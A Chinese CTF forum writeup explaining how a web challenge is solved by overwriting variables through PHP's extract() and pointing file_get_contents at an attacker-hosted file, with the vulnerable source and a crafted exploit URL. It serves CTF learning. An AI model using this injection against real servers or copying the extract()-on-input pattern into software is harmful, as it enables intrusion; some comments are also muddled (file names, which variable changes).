CTF论坛

[Writeup] web1利用RFI解题

2019-4-10 08:55
2492
题目:

code.jpg

看题型主要出题思路是变量覆盖+RFI(远程文件包含)

知识点链接:

变量覆盖:https://www.cnblogs.com/xiaozi/p/7768580.html

远程文件包含:https://blog.csdn.net/sx234com/article/details/88994605



解题过程代码分析;自己按照上面的代码写出来验证一下是最好的解题思路。

<?php
header("Content-type:text/html;charset=utf-8");
include 'flag.php';

//echo var_dump($_GET);

$b='ssAEDsssss';

extract($_GET); //见到extract函数 考虑变量覆盖

if(isset($a)){
    $c=trim(file_get_contents($b));

//A 此处 读取$b的值 因为使用了file_get_contents函数则有可能出现RFI远程文件包含漏洞
//B 构造一个远程文件info.txt 放置在我自己的服务器上面 info.txt中内容为 1  远程访问链接为http://自己的域名/info.txt
//C 而$b变量上面已经赋值 见到extract函数 考虑变量覆盖
//D 故 url在构造的时候就可以进行赋值覆盖上面$b='ssAEDsssss'; 的值 利用上面B得到的url 让file_get_contents读取远程info.txt内容1 覆盖变量$b 则$b的值为1
//E 构造URL 如下:http://123.206.31.85:10001/?a=1&b=http://你的域名/readme.txt&c=1 使传入值全部为1 触发成功


    echo 'b='.$b.'<br/>';
    echo 'a='.$a.'<br/>';
    echo 'c='.$c.'<br/>';

    if($a==$c){
        echo "ok flag is xxx";
    }else{
        echo '不行没得到!';
    }
}

得到的运行结果如下:
11111.png


参与人数 1银两 +3 收起 理由
Harry + 3

查看全部评分

分享到 :
0 人收藏

2 个回复

倒序浏览
王叹之  初入江湖 | 2019-4-13 09:38:44
666学到了
Never  初入江湖 | 7 天前
谢谢,学到了
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

sx234com

小有名气

积分: 112 帖子: 5 精华: 0

Archiver|手机版|小黑屋|CTF论坛 ( 鲁ICP备15028801号-2 )

Powered by Bugku! X3.4 © 2017 CTFbbs.

返回顶部